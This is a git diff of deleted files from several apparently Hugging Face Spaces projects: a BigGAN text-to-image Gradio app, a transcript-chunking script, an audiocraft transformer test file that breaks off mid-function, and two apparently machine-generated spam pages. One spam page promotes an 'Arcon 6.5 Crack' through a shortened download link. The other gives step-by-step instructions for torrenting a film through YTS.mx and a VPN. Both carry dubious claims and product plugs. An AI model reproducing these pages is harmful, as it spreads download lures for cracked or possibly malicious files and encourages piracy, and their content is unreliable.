BigGAN.from_pretrained(config["image_gen_model"]) -gan_model.to(device) -gan_model.eval() -print("Models were loaded") - - -def generate_image(dense_class_vector=None, int_index=None, noise_seed_vector=None, truncation=0.4): - seed = int(noise_seed_vector.sum().item()) if noise_seed_vector is not None else None - noise_vector = truncated_noise_sample(truncation=truncation, batch_size=1, seed=seed) - noise_vector = torch.from_numpy(noise_vector) - if int_index is not None: - class_vector = one_hot_from_int([int_index], batch_size=1) - class_vector = torch.from_numpy(class_vector) - dense_class_vector = gan_model.embeddings(class_vector) - else: - if isinstance(dense_class_vector, np.ndarray): - dense_class_vector = torch.tensor(dense_class_vector) - dense_class_vector = dense_class_vector.view(1, 128) - - input_vector = torch.cat([noise_vector, dense_class_vector], dim=1) - - # Generate an image - with torch.no_grad(): - output = gan_model.generator(input_vector, truncation) - output = output.cpu().numpy() - output = output.transpose((0, 2, 3, 1)) - output = ((output + 1.0) / 2.0) * 256 - output.clip(0, 255, out=output) - output = np.asarray(np.uint8(output[0]), dtype=np.uint8) - return output - - -def print_image(numpy_array): - """ Utility function to print a numpy uint8 array as an image - """ - img = Image.fromarray(numpy_array) - plt.imshow(img) - plt.show() - - -def text_to_image(text): - tokens = tokenizer.encode(text, add_special_tokens=True, return_tensors='pt').to(device) - with torch.no_grad(): - lm_output = model(tokens, return_dict=True) - pred_int_index = torch.argmax(lm_output.logits[0], dim=-1).cpu().detach().numpy().tolist() - print(pred_int_index) - - # Now 
generate an image (a numpy array) - numpy_image = generate_image(int_index=pred_int_index, - truncation=truncation, - noise_seed_vector=tokens) - - img = Image.fromarray(numpy_image) - #print_image(numpy_image) - return img - -examples = ["a high resoltuion photo of a pizza from famous food magzine.", - "this is a photo of my pet golden retriever.", - "this is a photo of a trouble some street cat.", - "a blur image of coral reef.", - "a yellow taxi cab commonly found in USA.", - "Once upon a time, there was a black ship full of pirates.", - "a photo of a large castle.", - "a sketch of an old Church"] - -if __name__ == '__main__': - interFace = gr.Interface(fn=text_to_image, - inputs=gr.inputs.Textbox(placeholder="Enter the text to generate an image", label="Text " - "query", - lines=1), - outputs=gr.outputs.Image(type="auto", label="Generated Image"), - verbose=True, - examples=examples, - title="Generate Image from Text", - description="", - theme="huggingface") - interFace.launch() diff --git a/spaces/srikanth-nm/ai_seeker/chunks_create.py b/spaces/srikanth-nm/ai_seeker/chunks_create.py deleted file mode 100644 index cfab2a521592bd1cb38e421f7bcf73af0b13b769..0000000000000000000000000000000000000000 --- a/spaces/srikanth-nm/ai_seeker/chunks_create.py +++ /dev/null @@ -1,44 +0,0 @@ -import json - -def combine_and_calculate(input_file_path, output_file_path): - with open(input_file_path, 'r') as file: - output_data = json.load(file) - - combined_json_list = [] - - # Calculate the number of groups to create - num_groups = (len(output_data) + 7) // 8 - - for group_num in range(num_groups): - # Calculate the starting index and ending index for the current group - start_index = group_num * 8 - end_index = min(start_index + 8, len(output_data)) - - # Extract the "text" values from the current group of dictionaries - combined_text = " ".join([item["text"] for item in output_data[start_index:end_index]]) - - # Calculate the "start" and "end" for the current group - group_start = output_data[start_index]["start"] - group_end = output_data[end_index - 1]["end"] - - # Create the combined JSON for the current group - combined_json = { - "text": combined_text, - "start": group_start, - "end": group_end, - } - - combined_json_list.append(combined_json) - - # Save the combined JSON list to a new file - with open(output_file_path, 'w') as output_file: - json.dump(combined_json_list, output_file) - -# Replace 'output_file.json' with the path to the output JSON file you created previously -input_file_path = '/home/bharathi/langchain_experiments/GenAI/transcript_end.json' - -# Replace 'combined_output_file.json' with the desired path and filename for the combined JSON file -output_file_path = '/home/bharathi/langchain_experiments/GenAI/chunks.json' - -# Call the function to create the combined JSON and save it to a new file -combine_and_calculate(input_file_path, output_file_path) diff --git a/spaces/sriramelango/Social_Classification_Public/fairseq/tests/__init__.py b/spaces/sriramelango/Social_Classification_Public/fairseq/tests/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/stomexserde/gpt4-ui/Examples/Arcon 6.5 [CRACKED] Crack.md b/spaces/stomexserde/gpt4-ui/Examples/Arcon 6.5 [CRACKED] Crack.md deleted file mode 100644 index 63a7f74515c7055bf447b4b91ab8e273e2c31868..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Arcon 6.5 [CRACKED] Crack.md +++ /dev/null @@ -1,162 +0,0 
@@ - -

      Arcon 6.5 Crack: What You Need to Know Before Downloading

      -

      If you are looking for powerful and versatile software for architectural design, 3D modeling, and rendering, you may have heard of Arcon 6.5. Arcon 6.5 is a software tool that allows you to create realistic and detailed architectural projects, from floor plans and elevations to 3D views and animations. It is compatible with various CAD and BIM formats, such as DWG, DXF, SKP, and IFC, and it also has a large library of objects, materials, textures, and lighting effects that you can use to customize your designs.

      -

      However, Arcon 6.5 is not cheap. The full version of Arcon 6.5 costs around $1,000 USD, which may be too expensive for some users. Moreover, the trial version of Arcon 6.5 has many limitations, such as a limited number of objects, a watermark on the output, and a 30-day expiration date. Therefore, some people may be tempted to look for a cracked version of Arcon 6.5 online, hoping to get the full features and benefits of the software without paying for it.

      -

      Arcon 6.5 Crack


      DOWNLOAD ->>->>->> https://urlgoal.com/2uI6Aj



      -

      But is downloading Arcon 6.5 crack a good idea? What are the risks and benefits of using a cracked version of Arcon 6.5? In this article, we will answer these questions and help you decide whether to download Arcon 6.5 crack or not.

      -

      What is Arcon 6.5?

      -

      Arcon 6.5 is a software package developed by Elecosoft, a company that specializes in software solutions for the construction industry. It is part of the Arcon Evo series, the latest generation of Arcon software.

      -

      Arcon 6.5 is designed to help architects, designers, builders, and homeowners create stunning architectural projects with ease and accuracy. It has many features and functions that make it a powerful and versatile tool, such as:

      -
        -
      • A user-friendly interface that allows you to work in 2D or 3D mode
      • -
      • A smart drawing tool that automatically generates walls, doors, windows, roofs, stairs, and other elements
      • -
      • A dynamic editing tool that lets you modify your design in real-time
      • -
      • A comprehensive object library that contains over 8,000 objects, such as furniture, fixtures, appliances, plants, vehicles, and more
      • -
      • A realistic rendering engine that produces high-quality images and animations with shadows, reflections, textures, and lighting effects
      • -
      • A flexible export and import function that supports various CAD and BIM formats, such as DWG, DXF, SKP, IFC, PDF, JPG, BMP, and more
      • -
      • A collaboration feature that allows you to share your projects with other users or clients via email or cloud storage
      • -
      -

      With Arcon 6.5, you can create any type of architectural project, from residential to commercial, from interior to exterior, from simple to complex. You can also customize your design according to your preferences and requirements.

      -

      Why do people want to crack Arcon 6.5?

      -

      As mentioned earlier, Arcon 6.5 is not cheap. The full version of Arcon 6.5 costs around $1,000 USD, which may be too expensive for some users who want to use the software for personal or professional purposes.

      -

      Moreover, the trial version of Arcon 6.5 has many limitations that prevent users from fully experiencing the features and functions of the software. For example:

      -

      -
        -
      • The trial version only allows you to use up to 50 objects in your project
      • -
      • The trial version adds a watermark on your output files
      • -
      • The trial version expires after 30 days of use
      • -
      • The trial version does not include all the features and updates of the full version
      • -
      -

      Therefore, some people may want to crack Arcon 6.5 in order to bypass the license and activation process of the software and use it without paying for it or having any restrictions.

      -

      The high cost of Arcon 6.5 license

      -

      One of the main reasons why people want to crack Arcon 6.5 is the high cost of the license fee for the full version of the software. As mentioned earlier, the full version of Arcon 6.5 costs around $1,000 USD, which is a significant amount of money for many users, especially those who only need the software for a short-term project or a one-time purpose and do not want to invest that much money in a software license.

      -

      Moreover, Arcon 6.5 is not the only software that offers architectural design, 3D modeling, and rendering features. There are other similar programs that are cheaper or even free to use, such as SketchUp, Blender, AutoCAD, Revit, and more. Therefore, some users may think that Arcon 6.5 is overpriced and not worth paying for.

      -

      For example, SketchUp is a popular program that allows users to create 3D models of anything, from buildings and furniture to landscapes and vehicles. SketchUp has a free version that can be used for personal projects and a pro version that costs $299 USD per year for professional use. SketchUp also has a large community of users who share their models and resources online. SketchUp is compatible with various CAD and BIM formats, such as DWG, DXF, SKP, IFC, and more.

      -

      Blender is another popular program used for creating 3D models, animations, visual effects, and games. Blender is completely free and open source, meaning that anyone can download, use, modify, and distribute it without any restrictions. Blender has a powerful rendering engine that can produce realistic images and videos with advanced features such as ray tracing, volumetrics, motion blur, and more. Blender also has a large community of users who contribute to the development and improvement of the software.

      -

      AutoCAD is one of the most widely used programs for CAD and BIM applications. AutoCAD allows users to create 2D drawings and 3D models of various types of projects, such as architecture, engineering, construction, manufacturing, and more. AutoCAD has a subscription-based pricing model that costs $210 USD per month or $1,690 USD per year for individual use. AutoCAD also has a free trial version that lasts for 30 days.

      -

      Revit is another program used for CAD and BIM applications. Revit allows users to create 3D models of buildings and structures that are integrated with information such as materials, dimensions, schedules, costs, and more. Revit also has a subscription-based pricing model that costs $280 USD per month or $2,250 USD per year for individual use. Revit also has a free trial version that lasts for 30 days.
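
      -

      Taken over a full year, those subscription models also reward annual billing: AutoCAD at $210 USD per month comes to $210 × 12 = $2,520 USD versus $1,690 USD on the annual plan, and Revit at $280 USD per month comes to $280 × 12 = $3,360 USD versus $2,250 USD per year, so the yearly licenses save roughly $830 USD and $1,110 USD respectively.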

      -

      As you can see, there are many alternatives to Arcon 6.5 that are cheaper or free to use. Therefore, some users may prefer to use these software instead of paying for Arcon 6.5 license.

      -

      The limited availability of Arcon 6.5 trial version

      -

      Another reason why people want to crack Arcon 6.5 is the limited availability of the trial version of the software. As mentioned earlier, the trial version of Arcon 6.5 has many limitations that prevent users from fully experiencing the features and functions of the software. For example, the trial version only allows users to use up to 50 objects in their project, adds a watermark on their output files, expires after 30 days of use, and does not include all the features and updates of the full version.

      -

      Therefore, some users may feel frustrated and dissatisfied with the trial version of Arcon 6.5 and want to crack the software in order to get unlimited access to all the features and functions of the software. They may think that the trial version does not give them enough time or opportunity to test and evaluate the software before deciding whether to buy it or not.

      -

      Moreover, some users may have difficulty finding or downloading the trial version of Arcon 6.5 online. The official website of Arcon 6.5 does not provide a direct link to download the trial version of the software. Instead, users have to fill out a form with their personal and professional details and wait for an email from Elecosoft with a download link and an activation code. This process may take some time and effort, and some users may not receive the email or the link may not work properly.

      -

      Therefore, some users may look for alternative ways to download Arcon 6.5 online, such as torrent sites, file-sharing platforms, or crack websites. These sources may claim to offer a cracked version of Arcon 6.5 that does not require any license or activation and can be used without any limitations.

      -

      The desire to access all features and updates of Arcon 6.5

      -

      A third reason why people want to crack Arcon 6.5 is the desire to access all features and updates of the software. As mentioned earlier, Arcon 6.5 has many features and functions that make it a powerful and versatile software for architectural design, 3D modeling, and rendering.

      -

      However, not all features and functions are available in the trial version or the older versions of Arcon 6.5. Some features and updates are exclusive to the full version or the latest version of Arcon 6.5, such as:

      -
        -
      • A new user interface that is more intuitive and user-friendly
      • -
      • A new drawing tool that allows users to create curved walls, sloped roofs, complex shapes, and more
      • -
      • A new rendering engine that supports ray tracing, global illumination, ambient occlusion, depth of field, and more
      • -
      • A new export and import function that supports more CAD and BIM formats, such as OBJ, STL, VRML, DAE, KMZ, and more
      • -
      • A new collaboration feature that allows users to work on projects with other users in real-time via cloud storage
      • -
      -

      These features and updates can enhance the quality and performance of Arcon 6.5 and provide users with more options and possibilities for their projects. Therefore, some users may want to crack Arcon 6.5 in order to access all features and updates of the software without paying for them or waiting for them.

      -

      What are the risks and benefits of using a cracked version of Arcon 6.5?

      -

      Now that we have discussed why people want to crack Arcon 6.5, let us examine what are the risks and benefits of using a cracked version of Arcon 6.5.

      -

      Using a cracked version of Arcon 6.5 may seem like a good idea at first glance, as it may offer some advantages over using the licensed or trial version of the software. However, using a cracked version of Arcon 6.5 also comes with some disadvantages that may outweigh the advantages in the long run.

      -

      Therefore, it is important to weigh the pros and cons of using a cracked version of Arcon 6.5 before deciding whether to download it or not.

      -

      The benefits of using a cracked version of Arcon 6.5

      -

      Some of the benefits of using a cracked version of Arcon 6.5 are:

      -

      Saving money on license fees

      -

      One of the obvious benefits of using a cracked version of Arcon 6.5 is saving money on license fees. As mentioned earlier, the full version of Arcon 6.5 costs around $1,000 USD, which is a significant amount of money for many users. By using a cracked version of Arcon 6.5, users can avoid paying this fee and save money for other purposes.

      -

      For example, if a user needs to use Arcon 6.5 for a one-time project that lasts for a month, they may not want to pay $1,000 USD for a software license that they will not use again. By using a cracked version of Arcon 6.5, they can save $1,000 USD and use it for other expenses, such as materials, equipment, labor, or marketing.

      -

      Similarly, if a user wants to use Arcon 6.5 for personal or hobby purposes, they may not have the budget or the willingness to pay $1,000 USD for a software license that they will use occasionally. By using a cracked version of Arcon 6.5, they can save $1,000 USD and use it for other hobbies, such as travel, gaming, or entertainment.

      -

      Enjoying unlimited access to all features and updates

      -

      Another benefit of using a cracked version of Arcon 6.5 is enjoying unlimited access to all features and updates of the software. As mentioned earlier, the trial version and the older versions of Arcon 6.5 have many limitations and restrictions that prevent users from fully experiencing the features and functions of the software. Some features and updates are exclusive to the full version or the latest version of Arcon 6.5.

      -

      By using a cracked version of Arcon 6.5, users can bypass these limitations and restrictions and use all features and updates of the software without any problems. They can create any type of architectural project with any level of complexity and detail. They can also customize their design according to their preferences and requirements.

      -

      For example, if a user wants to create a curved wall in their project, they may not be able to do so with the trial version or the older versions of Arcon 6.5, as this feature is only available in the full version or the latest version of Arcon 6.5. By using a cracked version of Arcon 6.5, they can create a curved wall with ease and accuracy.

      -

      Similarly, if a user wants to export their project in a specific CAD or BIM format, such as OBJ or STL, they may not be able to do so with the trial version or the older versions of Arcon 6.5, as this feature is only available in the full version or the latest version of Arcon 6.5. By using a cracked version of Arcon 6.5, they can export their project in any format they want.

      -

      Exploring different versions and modules of Arcon 6.5

      -

      A third benefit of using a cracked version of Arcon 6.5 is exploring different versions and modules of the software. As mentioned earlier, Arcon 6.5 is part of the Arcon Evo series, which is the latest generation of Arcon software. However, there are also older versions of Arcon software, such as Arcon 5.0, Arcon 4.0, Arcon 3.0, and more. Each version of Arcon software has different features and functions that may suit different needs and preferences of users.

      -

      By using a cracked version of Arcon 6.5, users can explore different versions of Arcon software and compare their differences and similarities. They can also switch between different versions of Arcon software without any compatibility issues or data loss.

      -

      For example, if a user wants to use a feature that is only available in an older version of Arcon software, such as a specific object or material, they can use a cracked version of Arcon 6.5 to access that feature without having to install or uninstall different versions of Arcon software.

      -

      Similarly, if a user wants to use a feature that is only available in a newer version of Arcon software, such as a specific rendering or export option, they can use a cracked version of Arcon 6.5 to access that feature without having to upgrade or downgrade their version of Arcon software.

      -

      In addition to different versions of Arcon software, there are also different modules of Arcon software that offer specialized features and functions for specific types of projects, such as:

      -
        -
      • Arcon Landscape Design: A module that allows users to create realistic and detailed landscapes and gardens with plants, trees, flowers, water features, paths, fences, and more
      • -
      • Arcon Kitchen Design: A module that allows users to create custom and functional kitchens with cabinets, countertops, appliances, sinks, faucets, lighting, and more
      • -
      • Arcon Bathroom Design: A module that allows users to create stylish and comfortable bathrooms with bathtubs, showers, toilets, sinks, faucets, mirrors, tiles, and more
      • -
      • Arcon Interior Design: A module that allows users to create cozy and elegant interiors with furniture, fixtures, accessories, carpets, curtains, wallpapers, and more
      • -
      • Arcon Roof Design: A module that allows users to create complex and realistic roofs with different shapes, slopes, materials, windows, skylights, chimneys, and more
      • -
      -

      By using a cracked version of Arcon 6.5, users can explore different modules of Arcon software and use them for their projects without having to buy or install them separately.

      -

      The risks of using a cracked version of Arcon 6.5

      -

      However, using a cracked version of Arcon 6.5 is not without risks. Some of the risks of using a cracked version of Arcon 6.5 are:

      -

      Violating the terms and conditions of Arcon 6.5 license agreement

      -

      One of the obvious risks of using a cracked version of Arcon 6.5 is violating the terms and conditions of the license agreement that users have to accept when they buy or download the software from the official website.

      -

      The license agreement is a legal contract between the user and Elecosoft that defines the rights and obligations of both parties regarding the use of the software. The license agreement states that the user can only use the software for their own personal or professional purposes and cannot distribute, copy, modify, or crack the software without the permission of Elecosoft. The license agreement also states that the user is responsible for any damages or losses that may result from the use of the software and that Elecosoft is not liable for any warranty or support for the software.

      -

      By using a cracked version of Arcon 6.5, users are breaking the license agreement and infringing the intellectual property rights of Elecosoft. This is a serious offense that may result in legal actions and penalties, such as fines, lawsuits, or even criminal charges. Elecosoft may also revoke the user's license and access to the software and any related services or products.

      -

      For example, in 2019, Autodesk, a company that produces software for CAD and BIM applications, such as AutoCAD and Revit, sued several individuals and companies for using cracked versions of their software. Autodesk claimed that these defendants violated their license agreement and caused them significant losses in revenue and reputation. Autodesk sought damages of up to $150,000 USD per infringement and an injunction to stop the defendants from using their software.

      -

      Therefore, using a cracked version of Arcon 6.5 is not worth the risk of facing legal consequences and losing your license and access to the software.

      -

      Exposing your computer to malware and viruses

      -

      Another risk of using a cracked version of Arcon 6.5 is exposing your computer to malware and viruses. As mentioned earlier, some users may have difficulty finding or downloading the trial version of Arcon 6.5 online and may look for alternative ways to download Arcon 6.5 online, such as torrent sites, file-sharing platforms, or crack websites.

      -

      However, these sources are not reliable or trustworthy, as they may contain malicious files or programs that can harm your computer or steal your personal information. These files or programs may be disguised as Arcon 6.5 crack files or activation codes, but they are actually malware or viruses that can infect your computer once you download or run them.

      -

      Some examples of malware or viruses that may come with a cracked version of Arcon 6.5 are:

      -
        -
      • Trojans: A type of malware that can create backdoors in your computer and allow hackers to access your system and data remotely
      • -
      • Ransomware: A type of malware that can encrypt your files and demand a ransom for their decryption
      • -
      • Spyware: A type of malware that can monitor your online activities and collect your personal information, such as passwords, credit card numbers, bank accounts, etc.
      • -
      • Adware: A type of malware that can display unwanted ads on your browser or desktop
      • -
      • Worms: A type of virus that can spread from one computer to another through networks or removable devices
      • -
      • Rootkits: A type of virus that can hide itself from detection and removal by antivirus software
      • -
      -

      These malware or viruses can cause serious problems for your computer, such as slowing down your system, deleting or corrupting your files, crashing your programs, displaying error messages, changing your settings, stealing your identity, extorting your money, or even destroying your hardware.

      -

      For example, in 2017, a ransomware attack called WannaCry infected hundreds of thousands of computers worldwide, including those of hospitals, banks, schools, and governments. WannaCry encrypted the files of the infected computers and demanded a ransom of $300 USD in Bitcoin for their decryption. WannaCry spread through a vulnerability in the Windows operating system that was exploited by a leaked NSA hacking tool. Some users who downloaded a cracked version of Windows were among the victims of WannaCry.

      -

      Therefore, using a cracked version of Arcon 6.5 is not worth the risk of exposing your computer to malware and viruses.

      -

      Compromising the quality and performance of Arcon 6.5

      -

      A third risk of using a cracked version of Arcon 6.5 is compromising the quality and performance of the software. As mentioned earlier, Arcon 6.5 offers many features and functions that make it a powerful and versatile tool for architectural design, 3D modeling, and rendering.

      -

      However, a cracked version of Arcon 6.5 may not work properly or cause errors and crashes. This is because a cracked version of Arcon 6.5 may have been modified or tampered with by hackers or crackers who may have introduced bugs, glitches, or defects in the software. A cracked version of Arcon 6.5 may also have been infected with malware or viruses that may interfere with the software's functionality or stability.

      -

      Some examples of problems that may occur with a cracked version of Arcon 6.5 are:

      -
        -
      • The software may not start or run at all
      • -
      • The software may freeze or crash frequently
      • -
      • The software may display error messages or warnings
      • -
      • The software may produce corrupted or distorted output files
      • -
      • The software may not support some features or updates
      • -
      • The software may not be compatible with some CAD or BIM formats
      • -
      • The software may not be able to connect to the internet or cloud storage
      • -
      -

      These problems can affect the quality and performance of Arcon 6.5 and prevent users from completing their projects successfully and efficiently. They can also cause frustration and dissatisfaction for users who expect a smooth and reliable experience with the software.

      -

      For example, if a user wants to create a 3D model of a building with a cracked version of Arcon 6.5, they may encounter problems such as:

      -
        -
      • The software may not be able to generate walls, doors, windows, roofs, stairs, and other elements automatically
      • -
      • The software may not be able to modify the design in real-time
      • -
      • The software may not be able to render the model with realistic images and animations
      • -
      • The software may not be able to export the model in the desired CAD or BIM format
      • -
      • The software may not be able to share the model with other users or clients
      • -
      -

      These problems can result in a poor-quality and incomplete project that does not meet the user's expectations or requirements.

      -

      Therefore, using a cracked version of Arcon 6.5 is not worth the risk of compromising the quality and performance of the software.

      -

      Conclusion: Should You Download Arcon 6.5 Crack?

      -

      In conclusion, downloading Arcon 6.5 crack may seem like a tempting option for some users who want to use the software without paying for it or having any limitations. However, downloading Arcon 6.5 crack also comes with many risks that may outweigh the benefits in the long run.

      -

      Some of the benefits of downloading Arcon 6.5 crack are:

      -
        -
      • Saving money on license fees
      • -
      • Enjoying unlimited access to all features and updates
      • -
      • Exploring different versions and modules of Arcon 6.5
      • -
      -

      Some of the risks of downloading Arcon 6.5 crack are:

      -
        -
      • Violating the terms and conditions of Arcon 6.5 license agreement
      • -
      • Exposing your computer to malware and viruses
      • -
      • Compromising the quality and performance of Arcon 6.5
      • -
      -

      Therefore, we recommend that you do not download Arcon 6.5 crack and instead use the licensed or trial version of the software from the official website. This way, you can avoid legal consequences, protect your computer from threats, and ensure a high-quality and reliable experience with the software.

      -

      If you are interested in using Arcon 6.5 for your architectural projects, you can visit the official website to learn more about the features and functions of the software, download the trial version of the software, or buy the full version of the software. You can also contact Elecosoft for any questions or support regarding the software.

      -

      FAQs about Arcon 6.5 Crack

      -

      Here are some frequently asked questions about Arcon 6.5 crack with brief answers:

      -
        -
      1. What is Arcon 6.5 crack?
      2. -

        Arcon 6.5 crack is a term that refers to a modified or tampered version of Arcon 6.5 software that does not require any license or activation and can be used without any limitations.

        -
      3. Where can I download Arcon 6.5 crack?
      4. -

        There are many sources online that claim to offer Arcon 6.5 crack, such as torrent sites, file-sharing platforms, or crack websites. However, these sources are not reliable or trustworthy, as they may contain malicious files or programs that can harm your computer or steal your personal information.

        -
      5. Is it legal to download Arcon 6.5 crack?
      6. -

        No, it is not legal to download Arcon 6.5 crack, as it violates the terms and conditions of the license agreement that you have to accept when you buy or download the software from the official website. Downloading Arcon 6.5 crack also infringes the intellectual property rights of Elecosoft, the developer of the software. This is a serious offense that may result in legal actions and penalties, such as fines, lawsuits, or even criminal charges.

        -
      7. Is it safe to download Arcon 6.5 crack?
      8. -

        No, it is not safe to download Arcon 6.5 crack, as it exposes your computer to malware and viruses that can harm your computer or steal your personal information. These malware or viruses may be disguised as Arcon 6.5 crack files or activation codes, but they are actually malicious files or programs that can infect your computer once you download or run them.

        -
      9. Is it worth downloading Arcon 6.5 crack?
      10. -

        No, it is not worth downloading Arcon 6.5 crack, as it compromises the quality and performance of the software. A cracked version of Arcon 6.5 may not work properly or cause errors and crashes. This is because a cracked version of Arcon 6.5 may have been modified or tampered with by hackers or crackers who may have introduced bugs, glitches, or defects in the software. A cracked version of Arcon 6.5 may also have been infected with malware or viruses that may interfere with the software's functionality or stability.

        -

      -
      -
      \ No newline at end of file diff --git a/spaces/stomexserde/gpt4-ui/Examples/Julius Caesar 2002 Torrent 1080p ((EXCLUSIVE)).md b/spaces/stomexserde/gpt4-ui/Examples/Julius Caesar 2002 Torrent 1080p ((EXCLUSIVE)).md deleted file mode 100644 index 4aed84aba3516ddbff11a4eefb1a88983198ca96..0000000000000000000000000000000000000000 --- a/spaces/stomexserde/gpt4-ui/Examples/Julius Caesar 2002 Torrent 1080p ((EXCLUSIVE)).md +++ /dev/null @@ -1,28 +0,0 @@ -
      -

      How to Download Julius Caesar 2002 Torrent 1080p

      -

      If you are a fan of historical dramas, you might be interested in downloading Julius Caesar 2002 torrent 1080p. This is a TV miniseries that depicts the life and death of the famous Roman general and dictator, who shaped the fate of the ancient world. You can watch his campaigns in Gaul and Egypt, his rivalry with Pompey, and his tragic assassination by Brutus and Cassius.

      -

      Julius Caesar 2002 Torrent 1080p


      Downloadhttps://urlgoal.com/2uI6qW



      -

      But where can you find Julius Caesar 2002 torrent 1080p? And how can you download it safely and legally? Here are some tips to help you out.

      -

      Find a Reliable Torrent Site

      -

      The first step is to find a reliable torrent site that offers Julius Caesar 2002 torrent 1080p. There are many torrent sites on the internet, but not all of them are trustworthy or secure. Some may contain malware, viruses, or fake files that can harm your device or compromise your privacy.

      -

      One of the best torrent sites that we recommend is YTS.mx. This site has a large collection of movies and TV shows in high quality and small file size. You can easily find Julius Caesar 2002 torrent 1080p on this site by searching for it in the search bar or browsing through the categories.

      -

      Use a VPN Service

      -

      The next step is to use a VPN service before downloading Julius Caesar 2002 torrent 1080p. A VPN, or virtual private network, is a tool that encrypts your internet traffic and hides your IP address from prying eyes. This way, you can protect your online identity and avoid any legal issues or ISP throttling that may arise from torrenting.

      -

      There are many VPN services available on the market, but not all of them are suitable for torrenting. Some may have slow speeds, limited bandwidth, or poor security features. You need to choose a VPN service that offers fast and unlimited torrenting, strong encryption, and a no-logs policy.

      -

      One of the best VPN services that we recommend is ExpressVPN. This service has over 3000 servers in 94 countries, including many optimized for P2P file sharing. It also has AES-256 encryption, a kill switch, split tunneling, and DNS leak protection. You can try ExpressVPN risk-free with its 30-day money-back guarantee.

      -

      Download Julius Caesar 2002 Torrent 1080p

      -

      The final step is to download Julius Caesar 2002 torrent 1080p from YTS.mx using ExpressVPN. Here are the steps to follow:

      -

      -
        -
      1. Download and install ExpressVPN on your device.
      2. -
      3. Connect to a server location where torrenting is legal and safe.
      4. -
      5. Go to YTS.mx and search for Julius Caesar 2002 torrent 1080p.
      6. -
      7. Select the file with the highest quality and seeders.
      8. -
      9. Click on the download button and open the torrent file with your preferred torrent client.
      10. -
      11. Wait for the download to complete and enjoy watching Julius Caesar 2002 in HD.
      12. -
      -

      That's it! You have successfully downloaded Julius Caesar 2002 torrent 1080p. We hope you enjoy this epic historical drama and learn more about one of the most influential figures in history.

      -
      -
      \ No newline at end of file diff --git a/spaces/studiobrn/SplitTrack/tests/modules/test_transformer.py b/spaces/studiobrn/SplitTrack/tests/modules/test_transformer.py deleted file mode 100644 index 8c9953d9e8f139db7b8ce3063e3d5a78d2f5d088..0000000000000000000000000000000000000000 --- a/spaces/studiobrn/SplitTrack/tests/modules/test_transformer.py +++ /dev/null @@ -1,247 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from itertools import product - -import pytest -import torch - -from audiocraft.modules.transformer import StreamingMultiheadAttention, StreamingTransformer - - -def test_transformer_causal_streaming(): - torch.manual_seed(1234) - - for context, custom in product([None, 10], [False, True]): - # Test that causality and receptive fields are properly handled. - # looking at the gradients - tr = StreamingTransformer( - 16, 4, 1 if context else 2, - causal=True, past_context=context, custom=custom, - dropout=0.) - steps = 20 - for k in [0, 10, 15, 19]: - x = torch.randn(4, steps, 16, requires_grad=True) - y = tr(x) - y[:, k].abs().sum().backward() - if k + 1 < steps: - assert torch.allclose(x.grad[:, k + 1:], torch.tensor(0.)), x.grad[:, k + 1:].norm() - assert not torch.allclose(x.grad[:, :k + 1], torch.tensor(0.)), x.grad[:, :k + 1].norm() - if context is not None and k > context: - limit = k - context - 1 - assert torch.allclose(x.grad[:, :limit], - torch.tensor(0.)), x.grad[:, :limit].norm() - - # Now check that streaming gives the same result at batch eval. - x = torch.randn(4, steps, 16) - y = tr(x) - ys = [] - with tr.streaming(): - for k in range(steps): - chunk = x[:, k:k + 1, :] - ys.append(tr(chunk)) - y_stream = torch.cat(ys, dim=1) - delta = torch.norm(y_stream - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_transformer_vs_pytorch(): - torch.manual_seed(1234) - # Check that in the non causal setting, we get the same result as - # PyTorch Transformer encoder. - for custom in [False, True]: - tr = StreamingTransformer( - 16, 4, 2, - causal=False, custom=custom, dropout=0., positional_scale=0.) - layer = torch.nn.TransformerEncoderLayer(16, 4, dropout=0., batch_first=True) - tr_ref = torch.nn.TransformerEncoder(layer, 2) - tr.load_state_dict(tr_ref.state_dict()) - - x = torch.randn(4, 20, 16) - y = tr(x) - y2 = tr_ref(x) - delta = torch.norm(y2 - y) / torch.norm(y) - assert delta < 1e-6, delta - - -def test_streaming_api(): - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0.) 
- tr.eval() - steps = 12 - x = torch.randn(1, steps, 16) - - with torch.no_grad(): - with tr.streaming(): - _ = tr(x[:, :1]) - state = {k: v.clone() for k, v in tr.get_streaming_state().items()} - y = tr(x[:, 1:2]) - tr.set_streaming_state(state) - y2 = tr(x[:, 1:2]) - assert torch.allclose(y, y2), (y - y2).norm() - assert tr.flush() is None - - -def test_memory_efficient(): - torch.manual_seed(1234) - tr = StreamingTransformer( - 16, 4, 2, custom=True, dropout=0., layer_scale=0.1) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, layer_scale=0.1) - tr_mem_efficient.load_state_dict(tr.state_dict()) - tr.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_mem_efficient(x) - assert torch.allclose(y, y2), (y - y2).norm() - - -def test_attention_as_float32(): - torch.manual_seed(1234) - cases = [ - {'custom': True}, - {'custom': False}, - ] - for case in cases: - tr = StreamingTransformer(16, 4, 2, dropout=0., dtype=torch.bfloat16, **case) - tr_float32 = StreamingTransformer( - 16, 4, 2, dropout=0., attention_as_float32=True, dtype=torch.bfloat16, **case) - if not case['custom']: - # we are not using autocast here because it doesn't really - # work as expected on CPU, so we have to manually cast the weights of the MHA. - for layer in tr_float32.layers: - layer.self_attn.mha.to(torch.float32) - tr_float32.load_state_dict(tr.state_dict()) - steps = 12 - x = torch.randn(3, steps, 16, dtype=torch.bfloat16) - - with torch.no_grad(): - y = tr(x) - y2 = tr_float32(x) - assert not torch.allclose(y, y2), (y - y2).norm() - - -@torch.no_grad() -def test_streaming_memory_efficient(): - torch.manual_seed(1234) - tr = StreamingTransformer(16, 4, 2, causal=True, dropout=0., custom=True) - tr_mem_efficient = StreamingTransformer( - 16, 4, 2, dropout=0., memory_efficient=True, causal=True) - tr.load_state_dict(tr_mem_efficient.state_dict()) - tr.eval() - tr_mem_efficient.eval() - steps = 12 - x = torch.randn(3, steps, 16) - - ref = tr(x) - - with tr_mem_efficient.streaming(): - outs = [] - # frame_sizes = [2] + [1] * (steps - 2) - frame_sizes = [1] * steps - - for frame_size in frame_sizes: - 